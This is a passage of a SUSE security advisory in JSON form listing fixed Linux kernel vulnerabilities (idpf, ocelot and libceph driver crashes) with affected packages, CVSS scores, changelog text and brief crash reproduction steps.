"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: detach and close netdevs while handling a reset\n\nProtect the reset path from callbacks by setting the netdevs to detached\nstate and close any netdevs in UP state until the reset handling has\ncompleted. During a reset, the driver will de-allocate resources for the\nvport, and there is no guarantee that those will recover, which is why the\nexisting vport_ctrl_lock does not provide sufficient protection.\n\nidpf_detach_and_close() is called right before reset handling. If the\nreset handling succeeds, the netdevs state is recovered via call to\nidpf_attach_and_open(). If the reset handling fails the netdevs remain\ndown. The detach/down calls are protected with RTNL lock to avoid racing\nwith callbacks. On the recovery side the attach can be done without\nholding the RTNL lock as there are no callbacks expected at that point,\ndue to detach/close always being done first in that flow.\n\nThe previous logic restoring the netdevs state based on the\nIDPF_VPORT_UP_REQUESTED flag in the init task is not needed anymore, hence\nthe removal of idpf_set_vport_state(). The IDPF_VPORT_UP_REQUESTED is\nstill being used to restore the state of the netdevs following the reset,\nbut has no use outside of the reset handling flow.\n\nidpf_init_hard_reset() is converted to void, since it was used as such and\nthere is no error handling being done based on its return value.\n\nBefore this change, invoking hard and soft resets simultaneously will\ncause the driver to lose the vport state:\nip -br a\n\u003cinf\u003e\tUP\necho 1 \u003e /sys/class/net/ens801f0/device/reset\u0026 \\\nethtool -L ens801f0 combined 8\nip -br a\n\u003cinf\u003e\tDOWN\nip link set \u003cinf\u003e up\nip -br a\n\u003cinf\u003e\tDOWN\n\nAlso in case of a failure in the reset path, the netdev is left\nexposed to external callbacks, while vport resources are not\ninitialized, leading to a crash on subsequent ifup/down:\n[408471.398966] idpf 0000:83:00.0: HW reset detected\n[408471.411744] idpf 0000:83:00.0: Device HW Reset initiated\n[408472.277901] idpf 0000:83:00.0: The driver was unable to contact the device\u0027s firmware. Check that the FW is running. Driver state= 0x2\n[408508.125551] BUG: kernel NULL pointer dereference, address: 0000000000000078\n[408508.126112] #PF: supervisor read access in kernel mode\n[408508.126687] #PF: error_code(0x0000) - not-present page\n[408508.127256] PGD 2aae2f067 P4D 0\n[408508.127824] Oops: Oops: 0000 [#1] SMP NOPTI\n...\n[408508.130871] RIP: 0010:idpf_stop+0x39/0x70 [idpf]\n...\n[408508.139193] Call Trace:\n[408508.139637] \u003cTASK\u003e\n[408508.140077] __dev_close_many+0xbb/0x260\n[408508.140533] __dev_change_flags+0x1cf/0x280\n[408508.140987] netif_change_flags+0x26/0x70\n[408508.141434] dev_change_flags+0x3d/0xb0\n[408508.141878] devinet_ioctl+0x460/0x890\n[408508.142321] inet_ioctl+0x18e/0x1d0\n[408508.142762] ? _copy_to_user+0x22/0x70\n[408508.143207] sock_do_ioctl+0x3d/0xe0\n[408508.143652] sock_ioctl+0x10e/0x330\n[408508.144091] ? find_held_lock+0x2b/0x80\n[408508.144537] __x64_sys_ioctl+0x96/0xe0\n[408508.144979] do_syscall_64+0x79/0x3d0\n[408508.145415] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n[408508.145860] RIP: 0033:0x7f3e0bb4caff",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22981",
"url": "https://www.suse.com/security/cve/CVE-2026-22981"
},
{
"category": "external",
"summary": "SUSE Bug 1257225 for CVE-2026-22981",
"url": "https://bugzilla.suse.com/1257225"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22981"
},
{
"cve": "CVE-2026-22982",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22982"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: mscc: ocelot: Fix crash when adding interface under a lag\n\nCommit 15faa1f67ab4 (\"lan966x: Fix crash when adding interface under a lag\")\nfixed a similar issue in the lan966x driver caused by a NULL pointer dereference.\nThe ocelot_set_aggr_pgids() function in the ocelot driver has similar logic\nand is susceptible to the same crash.\n\nThis issue specifically affects the ocelot_vsc7514.c frontend, which leaves\nunused ports as NULL pointers. The felix_vsc9959.c frontend is unaffected as\nit uses the DSA framework which registers all ports.\n\nFix this by checking if the port pointer is valid before accessing it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22982",
"url": "https://www.suse.com/security/cve/CVE-2026-22982"
},
{
"category": "external",
"summary": "SUSE Bug 1257179 for CVE-2026-22982",
"url": "https://bugzilla.suse.com/1257179"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22982"
},
{
"cve": "CVE-2026-22984",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22984"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds reads in handle_auth_done()\n\nPerform an explicit bounds check on payload_len to avoid a possible\nout-of-bounds access in the callout.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22984",
"url": "https://www.suse.com/security/cve/CVE-2026-22984"
},
{
"category": "external",
"summary": "SUSE Bug 1257217 for CVE-2026-22984",
"url": "https://bugzilla.suse.com/1257217"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22984"
},
{
"cve": "CVE-2026-22985",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22985"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: Fix RSS LUT NULL pointer crash on early ethtool operations\n\nThe RSS LUT is not initialized until the interface comes up, causing\nthe following NULL pointer crash when ethtool operations like rxhash on/off\nare performed before the interface is brought up for the first time.\n\nMove RSS LUT initialization from ndo_open to vport creation to ensure LUT\nis always available. This enables RSS configuration via ethtool before\nbringing the interface up. Simplify LUT management by maintaining all\nchanges in the driver\u0027s soft copy and programming zeros to the indirection\ntable when rxhash is disabled. Defer HW programming until the interface\ncomes up if it is down during rxhash and LUT configuration changes.\n\nSteps to reproduce:\n** Load idpf driver; interfaces will be created\n\tmodprobe idpf\n** Before bringing the interfaces up, turn rxhash off\n\tethtool -K eth2 rxhash off\n\n[89408.371875] BUG: kernel NULL pointer 